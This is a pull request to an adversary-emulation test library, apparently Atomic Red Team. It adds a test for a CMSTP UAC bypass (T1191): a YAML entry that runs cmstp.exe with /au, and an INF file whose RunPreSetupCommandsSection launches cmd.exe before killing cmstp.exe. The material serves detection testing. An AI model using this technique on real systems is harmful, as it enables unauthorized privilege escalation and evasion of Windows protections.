### PR TITLE
T1191 uacbypass

### DIFF
--- a/atomics/T1191/T1191.yaml
+++ b/atomics/T1191/T1191.yaml
@@ -20,24 +20,20 @@ atomic_tests:
     command: |
       cmstp.exe /s #{inf_file_path}
 
-- name: TODO
+- name: CMSTP Executing UAC Bypass
   description: |
-    TODO
+    Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
 
   supported_platforms:
     - windows
-    - macos
-    - centos
-    - ubuntu
-    - linux
 
   input_arguments:
     output_file:
-      description: TODO
-      type: todo
-      default: TODO
+      description: Path to the INF file
+      type: path
+      default: T1191_uacbypass.inf
 
   executor:
     name: command_prompt
     command: |
-      TODO
+      cmstp.exe #{inf_file_path} /au

--- a/atomics/T1191/T1191.yaml
+++ b/atomics/T1191/T1191.yaml
@@ -19,3 +19,25 @@ atomic_tests:
     name: command_prompt
     command: |
       cmstp.exe /s #{inf_file_path}
+
+- name: TODO
+  description: |
+    TODO
+
+  supported_platforms:
+    - windows
+    - macos
+    - centos
+    - ubuntu
+    - linux
+
+  input_arguments:
+    output_file:
+      description: TODO
+      type: todo
+      default: TODO
+
+  executor:
+    name: command_prompt
+    command: |
+      TODO

--- a/atomics/T1191/T1191_uacbypass.inf
+++ b/atomics/T1191/T1191_uacbypass.inf
@@ -1,0 +1,29 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall]
+RunPreSetupCommands=RunPreSetupCommandsSection
+;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
+;AddReg=Xnstall.AddReg.AllUsers
+RegisterOCXs=RegisterOCXSection
+
+[RunPreSetupCommandsSection]
+; Commands Here will be run Before Setup Begins to install
+c:\windows\system32\cmd.exe
+taskkill /IM cmstp.exe /F
+
+[Strings]
+ServiceName="MalCorp"
+ShortSvcName="malcorp"
+DesktopGUID="{BC63D377-66BA-4935-BAD4-DD402D23A85A}"
+UninstallAppTitle="MalCorp"
+DesktopIcon=""
+PhonebookPath=""
+BeginPrompt="Do you want to remove MalCorp?"
+EndPrompt="Successfully removed MalCorp."
+DisplayLCID=1033
+CmLCID=1033
+
+
+


### PR DESCRIPTION
T1191.yaml fixed with correct content for UAC Bypass via invocation of command in RunPreSetupCommandsSection of INF.